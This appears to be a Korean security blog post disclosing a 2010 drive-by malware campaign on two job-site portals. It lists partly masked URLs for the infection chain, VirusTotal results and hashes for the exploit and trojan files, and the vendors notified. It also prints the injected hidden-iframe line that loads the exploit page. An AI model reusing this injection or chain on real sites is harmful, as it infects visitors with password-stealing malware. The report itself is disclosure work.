세의님의 알라딘 시리즈에 이어서 이에 뒤질세라 평일에 포털사이트인 캐리어도 유포를 시작하였습니다.현재 페이지는 오늘 오후에 변조가 되었음을 확인하였습니다. 그 결과 http://job.XXXX.net 에도 악성링크가 삽입되어서 현재는 취업 사이트인 캐리어와 잡 NEXT에서 유포 되고 있음을 확인 할 수 있습니다 !!
지난주에도 글을 쓸까 말까 하다가 이번에 다시 유포되고 있어서 이렇게 글을 써봅니다. 아무튼 이 사이트 둘은 매우 조심해야 아니 들어가지 말아야합니다 !! 악성코드는 캐리어와 NEXT음에서 유포하고 있습니다. 현재 원인으로써는 먼저 감염된 커리어에 있는거 같습니다. 커리어 http://www.caxxxx.co.kr/js/job_rnd_list.js 에서 job.XXXX.net 으로 유입된거 같습니다.
어쨌든 캐리어는 메인사이트에 들어가는 동시에 JOB NEXT음 은 JOB에 들어가는 동시에 감염이 되는거 같습니다.
[정리]
최초 유포지 : http://www.caxxxx.co.kr/
2차 유포지 : http://job.xxxx.net
악성코드 아이프레임 삽입 : http://xxxx.xxxx.net/xx/jquery.min.js
악성코드 연결 JS : http://2xx.143.48.xxx/xx/si.js
최종파일 연결 : http://2xx.143.48.xxx/xx/si.asp
최종파일 : http://www.sixxx.or.kr/xxot/txxx/down.exe
그중 si.js는 출력에만 접근한다면 쉽게 asp가 나올 수 있습니다.
출력 : document.write("<iframe src= http://2xx.143.48.xxx/xx/si.asp width=0 height=0></iframe>");
[바이러스 토탈]
si.js
Antivirus | Version | Last update | Result |
---|---|---|---|
AhnLab-V3 | 2010.10.01.00 | 2010.09.30 | JS/Downloader |
AntiVir | 7.10.12.92 | 2010.09.30 | - |
Antiy-AVL | 2.0.3.7 | 2010.09.30 | - |
Authentium | 5.2.0.5 | 2010.09.30 | - |
Avast | 4.8.1351.0 | 2010.09.30 | HTML:IFrame-JK |
Avast5 | 5.0.594.0 | 2010.09.30 | HTML:IFrame-JK |
AVG | 9.0.0.851 | 2010.09.30 | - |
BitDefender | 7.2 | 2010.09.30 | - |
CAT-QuickHeal | 11.00 | 2010.09.30 | - |
ClamAV | 0.96.2.0-git | 2010.10.01 | - |
Comodo | 6248 | 2010.10.01 | - |
DrWeb | 5.0.2.03300 | 2010.10.01 | - |
Emsisoft | 5.0.0.50 | 2010.09.30 | - |
eSafe | 7.0.17.0 | 2010.09.30 | - |
eTrust-Vet | 36.1.7885 | 2010.09.30 | - |
F-Prot | 4.6.2.117 | 2010.09.30 | - |
F-Secure | 9.0.15370.0 | 2010.10.01 | - |
Fortinet | 4.1.143.0 | 2010.09.30 | - |
GData | 21 | 2010.10.01 | HTML:IFrame-JK |
Ikarus | T3.1.1.90.0 | 2010.09.30 | - |
Jiangmin | 13.0.900 | 2010.09.30 | - |
K7AntiVirus | 9.63.2648 | 2010.09.30 | - |
Kaspersky | 7.0.0.125 | 2010.10.01 | - |
McAfee | 5.400.0.1158 | 2010.10.01 | - |
McAfee-GW-Edition | 2010.1C | 2010.09.30 | Heuristic.LooksLike.JS.Suspicious.B |
Microsoft | 1.6201 | 2010.09.30 | - |
NOD32 | 5493 | 2010.09.30 | - |
Norman | 6.06.07 | 2010.09.30 | - |
nProtect | 2010-09-30.01 | 2010.09.30 | - |
Panda | 10.0.2.7 | 2010.09.30 | - |
PCTools | 7.0.3.5 | 2010.10.01 | - |
Prevx | 3.0 | 2010.10.01 | - |
Rising | 22.67.02.07 | 2010.09.30 | - |
Sophos | 4.58.0 | 2010.10.01 | Mal/Iframe-Gen |
Sunbelt | 6952 | 2010.09.30 | - |
SUPERAntiSpyware | 4.40.0.1006 | 2010.10.01 | - |
Symantec | 20101.2.0.161 | 2010.09.30 | - |
TheHacker | 6.7.0.1.041 | 2010.09.30 | - |
TrendMicro | 9.120.0.1004 | 2010.09.30 | - |
TrendMicro-HouseCall | 9.120.0.1004 | 2010.10.01 | - |
VBA32 | 3.12.14.1 | 2010.09.27 | - |
ViRobot | 2010.8.31.4017 | 2010.09.30 | - |
VirusBuster | 12.66.8.0 | 2010.09.30 | - |
MD5: 82360d68e71cf37ae4400295f1746f08 |
SHA1: f67661ca29e253fde9bfda1ab5e0f54a0ddbf9dc |
SHA256: 0536c42b0bbcbc8a4db28fe2f0931eee93bda5b1c8586682293e1a8664fc61de |
File size: 424 bytes |
Scan date: 2010-10-01 00:13:28 (UTC) |
Antivirus | Version | Last update | Result |
---|---|---|---|
AhnLab-V3 | 2010.10.01.00 | 2010.09.30 | JS/Cve-2010-0806 |
AntiVir | 7.10.12.92 | 2010.09.30 | JS/Small.R |
Antiy-AVL | 2.0.3.7 | 2010.09.30 | - |
Authentium | 5.2.0.5 | 2010.09.30 | - |
Avast | 4.8.1351.0 | 2010.09.30 | JS:Downloader-RN |
Avast5 | 5.0.594.0 | 2010.09.30 | JS:Downloader-RN |
AVG | 9.0.0.851 | 2010.09.30 | - |
BitDefender | 7.2 | 2010.09.30 | - |
CAT-QuickHeal | 11.00 | 2010.09.30 | - |
ClamAV | 0.96.2.0-git | 2010.10.01 | - |
Comodo | 6248 | 2010.10.01 | - |
DrWeb | 5.0.2.03300 | 2010.10.01 | - |
Emsisoft | 5.0.0.50 | 2010.09.30 | - |
eSafe | 7.0.17.0 | 2010.09.30 | - |
eTrust-Vet | 36.1.7885 | 2010.09.30 | - |
F-Prot | 4.6.2.117 | 2010.09.30 | JS/Crypted.GA.gen |
F-Secure | 9.0.15370.0 | 2010.10.01 | - |
Fortinet | 4.1.143.0 | 2010.09.30 | - |
GData | 21 | 2010.10.01 | JS:Downloader-RN |
Ikarus | T3.1.1.90.0 | 2010.09.30 | - |
Jiangmin | 13.0.900 | 2010.09.30 | - |
K7AntiVirus | 9.63.2648 | 2010.09.30 | Riskware |
Kaspersky | 7.0.0.125 | 2010.10.01 | Exploit.JS.CVE-2010-0806.z |
McAfee | 5.400.0.1158 | 2010.10.01 | - |
McAfee-GW-Edition | 2010.1C | 2010.09.30 | Heuristic.BehavesLike.JS.BufferOverflow.A |
Microsoft | 1.6201 | 2010.09.30 | - |
NOD32 | 5493 | 2010.09.30 | - |
Norman | 6.06.07 | 2010.09.30 | - |
nProtect | 2010-09-30.01 | 2010.09.30 | Script-JS/W32.Agent.AEQ |
Panda | 10.0.2.7 | 2010.09.30 | - |
PCTools | 7.0.3.5 | 2010.10.01 | - |
Prevx | 3.0 | 2010.10.01 | - |
Rising | 22.67.02.07 | 2010.09.30 | Trojan.DL.Script.JS.Agent.qx |
Sophos | 4.58.0 | 2010.10.01 | Mal/JSBO-Gen |
Sunbelt | 6952 | 2010.09.30 | - |
SUPERAntiSpyware | 4.40.0.1006 | 2010.10.01 | - |
Symantec | 20101.2.0.161 | 2010.09.30 | - |
TheHacker | 6.7.0.1.041 | 2010.09.30 | - |
TrendMicro | 9.120.0.1004 | 2010.09.30 | - |
TrendMicro-HouseCall | 9.120.0.1004 | 2010.10.01 | - |
VBA32 | 3.12.14.1 | 2010.09.27 | - |
ViRobot | 2010.8.31.4017 | 2010.09.30 | JS.EX-CVE-2010-0806.5882.B |
VirusBuster | 12.66.8.0 | 2010.09.30 | - |
MD5: 5d9c846e08a768f648080e5d207aeb47 |
SHA1: f24d4dba37fd16eba993f337dbf357fca94dc533 |
SHA256: d795c3be4ec899f70b4b6c6c5e6900ef0537001072b92a304319c6f314d09034 |
File size: 6015 bytes |
Scan date: 2010-10-01 00:13:31 (UTC) |
Antivirus | Version | Last update | Result |
---|---|---|---|
AhnLab-V3 | 2010.10.01.00 | 2010.09.30 | Win-Trojan/Agent.54272.NF |
AntiVir | 7.10.12.92 | 2010.09.30 | TR/Crypt.ZPACK.Gen |
Antiy-AVL | 2.0.3.7 | 2010.09.30 | - |
Authentium | 5.2.0.5 | 2010.09.30 | - |
Avast | 4.8.1351.0 | 2010.09.30 | Win32:Malware-gen |
Avast5 | 5.0.594.0 | 2010.09.30 | Win32:Malware-gen |
AVG | 9.0.0.851 | 2010.09.30 | PSW.Generic8.VIP |
BitDefender | 7.2 | 2010.09.30 | Gen:Trojan.Heur.Zbot.dmW@cevx5Cj |
CAT-QuickHeal | 11.00 | 2010.09.30 | (Suspicious) - DNAScan |
ClamAV | 0.96.2.0-git | 2010.10.01 | - |
Comodo | 6248 | 2010.10.01 | - |
DrWeb | 5.0.2.03300 | 2010.10.01 | Trojan.PWS.Siggen.8181 |
Emsisoft | 5.0.0.50 | 2010.09.30 | Trojan.Win32.Pincav!IK |
eSafe | 7.0.17.0 | 2010.09.30 | - |
eTrust-Vet | 36.1.7886 | 2010.10.01 | - |
F-Prot | 4.6.2.117 | 2010.09.30 | - |
F-Secure | 9.0.15370.0 | 2010.10.01 | Gen:Trojan.Heur.Zbot.dmW@cevx5Cj |
Fortinet | 4.1.143.0 | 2010.09.30 | - |
GData | 21 | 2010.10.01 | Gen:Trojan.Heur.Zbot.dmW@cevx5Cj |
Ikarus | T3.1.1.90.0 | 2010.09.30 | Trojan.Win32.Pincav |
Jiangmin | 13.0.900 | 2010.09.30 | Trojan/Invader.add |
K7AntiVirus | 9.63.2648 | 2010.09.30 | Trojan |
Kaspersky | 7.0.0.125 | 2010.10.01 | Trojan.Win32.Pincav.ahzv |
McAfee | 5.400.0.1158 | 2010.10.01 | Generic.dx!tzh |
McAfee-GW-Edition | 2010.1C | 2010.09.30 | Generic.dx!tzh |
Microsoft | 1.6201 | 2010.09.30 | PWS:Win32/Magania.BQ |
NOD32 | 5493 | 2010.09.30 | a variant of Win32/PSW.Gamania.NBT |
Norman | 6.06.07 | 2010.09.30 | - |
nProtect | 2010-09-30.01 | 2010.09.30 | - |
Panda | 10.0.2.7 | 2010.09.30 | Generic Trojan |
PCTools | 7.0.3.5 | 2010.10.01 | Trojan-PSW.Gampass |
Prevx | 3.0 | 2010.10.01 | High Risk Cloaked Malware |
Rising | 22.67.02.07 | 2010.09.30 | - |
Sophos | 4.58.0 | 2010.10.01 | Mal/Dorf-F |
Sunbelt | 6952 | 2010.09.30 | Trojan.Win32.Generic!BT |
SUPERAntiSpyware | 4.40.0.1006 | 2010.10.01 | - |
Symantec | 20101.2.0.161 | 2010.09.30 | Infostealer.Gampass |
TheHacker | 6.7.0.1.041 | 2010.09.30 | Trojan/Pincav.ahzv |
TrendMicro | 9.120.0.1004 | 2010.09.30 | TROJ_PINCAV.SMXA |
TrendMicro-HouseCall | 9.120.0.1004 | 2010.10.01 | TROJ_PINCAV.SMXA |
VBA32 | 3.12.14.1 | 2010.09.27 | Malware-Cryptor.Inject.gen |
ViRobot | 2010.8.31.4017 | 2010.09.30 | - |
VirusBuster | 12.66.8.0 | 2010.09.30 | Trojan.Pincav.IVM |
MD5: 18d7b00b5d37587c7456b3c3a1181a69 |
SHA1: fcb91ed3d3b5e498bf3b4ce508351f3e3c51dab5 |
SHA256: 960af5ab7b18c06b4e4bb0580265585df20510f025b89300e7f364e800cbfa83 |
File size: 54272 bytes |
Scan date: 2010-10-01 00:19:25 (UTC) |
신고업체 : 안철수연구소 이스트 소프트 , 네이버 , 잉카인터넷
[안철수연구소]
1 si.js ~> V3 : JS/Downloader(추가 : 2010.10.01.00)
2 down.exe ~> V3 : Win-Trojan/Agent.54272.NF(추가 : 2010.10.01.00)
3 si.asp ~> V3 : JS/Cve-2010-0806(추가 : 2010.10.01.00)
이전 게시글
[security/보안 뉴스] - [카스퍼스키] 2010년 8월 악성 프로그램 통계
[security/악성코드 유포] - yahoo.js 의 유포날짜 2차 정리 !!
[security/악성코드 유포] - 아스키 코드로 이루어진 악성 아이프레임 !!
'security > 악성코드 유포' 카테고리의 다른 글
[악성코드 유포] 3차 유포 취업사이트 또 다시 악성코드 삽입 !! (3) | 2010.10.04 |
---|---|
악성코드 유포 !! 그들의 유포는 언제까지 계속 되는건가 ?? (2) | 2010.10.01 |
yahoo.js 의 유포날짜 2차 정리 !! (0) | 2010.09.26 |
아스키 코드로 이루어진 악성 아이프레임 !! (0) | 2010.09.19 |
RealNetworks RealPlayer ActiveX contorls Vulnerability (2) | 2010.09.10 |